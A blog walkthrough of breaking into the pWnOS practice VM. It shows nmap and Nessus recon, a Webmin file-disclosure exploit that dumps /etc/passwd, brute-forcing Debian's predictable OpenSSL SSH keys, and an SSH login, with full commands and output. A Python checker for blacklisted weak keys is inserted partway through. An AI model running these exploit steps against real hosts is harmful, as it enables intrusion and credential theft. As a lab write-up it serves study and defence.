Friday 14 September 2012

Privilege Escalation PwnOS

Posted at 07:46
Before launching the attack, we work through the standard phases of a penetration test (the hacking framework).

  1.  Information Gathering 
    In this section I collect information about the target using Nmap.
    root@bt:~# nmap -sS -A -p10-10000 192.168.56.101
    
    Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-09-14 10:46 WIT
    Nmap scan report for 192.168.56.101
    Host is up (0.00083s latency).
    Not shown: 9986 closed ports
    PORT      STATE SERVICE     VERSION
    22/tcp    open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
    | ssh-hostkey: 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
    |_2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
    80/tcp    open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
    |_http-title: Site doesn't have a title (text/html).
    |_http-methods: No Allow or Public header in OPTIONS response (status code 200)
    139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
    445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
    10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
    |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
    |_http-methods: No Allow or Public header in OPTIONS response (status code 200)
    MAC Address: 08:00:27:42:D9:A7 (Cadmus Computer Systems)
    Device type: general purpose
    Running: Linux 2.6.X
    OS CPE: cpe:/o:linux:kernel:2.6.22
    OS details: Linux 2.6.22 (embedded, ARM)
    Network Distance: 1 hop
    Service Info: OS: Linux; CPE: cpe:/o:linux:kernel
    
    Host script results:
    |_nbstat: NetBIOS name: UBUNTUVM, NetBIOS user: , NetBIOS MAC: 
    | smb-security-mode: 
    |   Account that was used for smb scripts: guest
    |   User-level authentication
    |   SMB Security: Challenge/response passwords supported
    |_  Message signing disabled (dangerous, but default)
    |_smbv2-enabled: Server doesn't support SMBv2 protocol
    | smb-os-discovery: 
    |   OS: Unix (Samba 3.0.26a)
    |   Computer name: ubuntuvm
    |   Domain name: nsdlab
    |   FQDN: ubuntuvm.NSDLAB
    |   NetBIOS computer name: 
    |_  System time: 2012-09-14 10:46:59 UTC-5
    
    TRACEROUTE
    HOP RTT     ADDRESS
    1   0.83 ms 192.168.56.101
    
    OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 25.11 seconds
    
  2.  Service Enumeration 
    Using the scan from the first section, we proceed to service enumeration. The exposed services are:
    PORT      STATE SERVICE     VERSION
    22/tcp    open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
    | ssh-hostkey: 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
    |_2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
    80/tcp    open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
    |_http-title: Site doesn't have a title (text/html).
    |_http-methods: No Allow or Public header in OPTIONS response (status code 200)
    139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
    445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
    10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
    
    
  3.  Vulnerability Assessment 
    I use Nessus for this step. Open Nessus and scan the target.

    The Nessus scan results show many vulnerabilities; you can choose among them as needed.
    The results show that Webmin is affected by an Arbitrary File Disclosure bug, so I will use it to gather username and password information.
  4.  Exploitation 
    From the Nessus results, I will use two bugs here: OpenSSL and Webmin.
    Go to your local exploitdb copy and search for the OpenSSL and Webmin exploits.
    First, I try the Webmin bug to download /etc/passwd and /etc/shadow.

    root@bt:~# cd /pentest/exploits/exploitdb/
    root@bt:/pentest/exploits/exploitdb# ./searchsploit webmin                                                                                 
     Description                                                                 Path                                                          
    ------------------------------
    Webmin BruteForce and Command Execution Exploit                             /multiple/remote/705.pl
    Webmin Web Brute Force v1.5 (cgi-version)                                   /multiple/remote/745.cgi
    Webmin BruteForce + Command Execution v1.5                                  /multiple/remote/746.pl
    Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit          /multiple/remote/1997.php
    Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl)   /multiple/remote/2017.pl
    phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
    phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
    phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
    phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
    phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
    Webmin 0.91 Directory Traversal Vulnerability                               /cgi/remote/21183.txt
    root@bt:/pentest/exploits/exploitdb# perl platforms/multiple/remote/2017.pl 192.168.56.101 10000 /etc/passwd 0
    WEBMIN EXPLOIT !!!!! coded by UmZ!
    Comments and Suggestions are welcome at umz32.dll [at] gmail.com
    Vulnerability disclose at securitydot.net
    I am just coding it in perl 'cuz I hate PHP!
    Attacking 192.168.56.101 on port 10000!
    FILENAME:  /etc/passwd
    
     FILE CONTENT STARTED
     -----------------------------------
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    backup:x:34:34:backup:/var/backups:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
    dhcp:x:100:101::/nonexistent:/bin/false
    syslog:x:101:102::/home/syslog:/bin/false
    klog:x:102:103::/home/klog:/bin/false
    mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
    sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
    vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
    obama:x:1001:1001::/home/obama:/bin/bash
    osama:x:1002:1002::/home/osama:/bin/bash
    yomama:x:1003:1003::/home/yomama:/bin/bash
    biasa:x:1004:1004:,,,:/home/biasa:/bin/bash
    -------------------------------------
    
    Now we know the usernames on the system.
    Next I will get access with one of the available usernames. One bug from the Nessus scan still remains: OpenSSL. Let's search exploitdb for it.

    root@bt# cd /pentest/exploits/exploitdb/
    root@bt# ./searchsploit openssl
    
     Description                                                                 Path
    --------------------------------------------------------------------------- -------------------------
    Brute forcer for OpenSSL ASN.1 parsing bugs (<=0.9.6j <=0.9.7b)             /multiple/dos/146.c
    Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)             /linux/remote/764.c
    OpenSSL < 0.9.7l / 0.9.8d SSLv2 Client Crash Exploit                        /multiple/dos/4773.pl
    Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit                      /multiple/remote/5622.txt
    Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (ruby)               /multiple/remote/5632.rb
    Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)             /linux/remote/5720.py
    OpenSSL <= 0.9.8k                                                           /multiple/dos/8720.c
    OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit                   /multiple/dos/8873.c
    OpenSSL remote DoS                                                          /linux/dos/12334.c
    OpenSSL ASN1 BIO Memory Corruption Vulnerability                            /multiple/dos/18756.txt
    OpenSSL ASN1 BIO Memory Corruption Vulnerability                            /multiple/dos/18756.txt
    PHP 6.0 openssl_verify() Local Buffer Overflow PoC                          /windows/dos/19963.txt
    
    Before running the exploit, we need the set of predictable SSH RSA keys generated by the Debian OpenSSL bug.
    Download them from http://digitaloffense.net/tools/debian-openssl/debian_ssh_rsa_2048_x86.tar.bz2.
    Extract the RSA keys; now it's time to run the exploit.
    root@bt# ruby /pentest/exploits/exploitdb/platforms/multiple/remote/5632.rb 192.168.56.101 vmware /home/biasa/viz/rsa/2048
    testing key 2/32768 /home/biasa/viz/rsa/2048/e04baf9d04ca7cd565d71880de75c58e-29931...
    testing key 3/32768 /home/biasa/viz/rsa/2048/2411614d9fe125cbb7f5b8f13fa1c0a0-18050...
    .......cut.......
    testing key 21377/32768 /home/biasa/viz/rsa/2048/70f4f5c0201d70a8e765bdc4a492d1da-15597...
    testing key 21378/32768 /home/biasa/viz/rsa/2048/f0d557e76c4e6380d81d49262dd7cb63-27526...
    KEYFILE FOUND: 
    /home/biasa/viz/rsa/2048/d8629ce6dc8f2492e1454c13f46adb26-4566
    Gotcha, we have the RSA key. Try it with SSH, but make sure that the key file permission is 755.
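The defender's counterpart of the key search above, added here as an example (not code from the post or from the exploit): it audits an authorized_keys file and flags any key whose fingerprint appears in a blacklist in the format Debian's openssh-blacklist package uses, the last 20 hex digits of the key's MD5 fingerprint. The authorized_keys content, the key blobs and the blacklist set are all constructed for the example; the blobs are not real keys.

```python
import base64
import hashlib

# Debian's openssh-blacklist lists the low 80 bits of each weak key's MD5
# fingerprint, i.e. the last 20 hex digits of what ssh-keygen -l prints.
TAIL_HEX_DIGITS = 20
KEY_TYPES = {"ssh-rsa", "ssh-dss"}

# Constructed authorized_keys content; the blobs are fabricated, not real keys.
# The first entry carries an options field, as sshd allows.
WEAK_BLOB = "AAAAB3NzaC1yc2EAAAABIwAAAQEAweakweakweakweak"
GOOD_BLOB = "AAAAB3NzaC1yc2EAAAABIwAAAQEAgoodgoodgoodgood"
AUTHORIZED_KEYS = (
    'command="/usr/bin/backup --verbose" ssh-rsa ' + WEAK_BLOB + " vmware@ubuntuvm\n"
    "# comment lines are ignored\n"
    "ssh-rsa " + GOOD_BLOB + " obama@ubuntuvm\n"
)

def fingerprint_tail(blob_b64):
    """Blacklist token for a key: last 20 hex digits of the MD5 of the blob."""
    digest = hashlib.md5(base64.b64decode(blob_b64)).hexdigest()
    return digest[-TAIL_HEX_DIGITS:]

def parse_authorized_keys(text):
    """Return (key_type, blob, comment) for each key line. Tokens before the
    key-type token are the options field, so quoted spaces there are harmless."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        for i, tok in enumerate(fields):
            if tok in KEY_TYPES and i + 1 < len(fields):
                entries.append((tok, fields[i + 1], " ".join(fields[i + 2:])))
                break
    return entries

def find_blacklisted(text, blacklist):
    """Comments (normally user@host) of keys whose fingerprint tail is blacklisted."""
    return [comment for _, blob, comment in parse_authorized_keys(text)
            if fingerprint_tail(blob) in blacklist]

# Constructed blacklist; in practice load the openssh-blacklist package's files.
WEAK_BLACKLIST = {fingerprint_tail(WEAK_BLOB)}

if __name__ == "__main__":
    for comment in find_blacklisted(AUTHORIZED_KEYS, WEAK_BLACKLIST):
        print("blacklisted key in authorized_keys:", comment)
```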
  5.  Privilege Escalation 
    Let's connect using SSH.

    root@bt:/pentest/exploits/exploitdb# ssh -i /home/biasa/viz/rsa/2048/d8629ce6dc8f2492e1454c13f46adb26-4566 vmware@192.168.56.101
    Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686
    
    The programs included with the Ubuntu system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.
    
    Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
    applicable law.
    Last login: Thu Sep 13 10:31:22 2012 from 192.168.56.1
    vmware@ubuntuvm:~$ 
    OK, we have access.
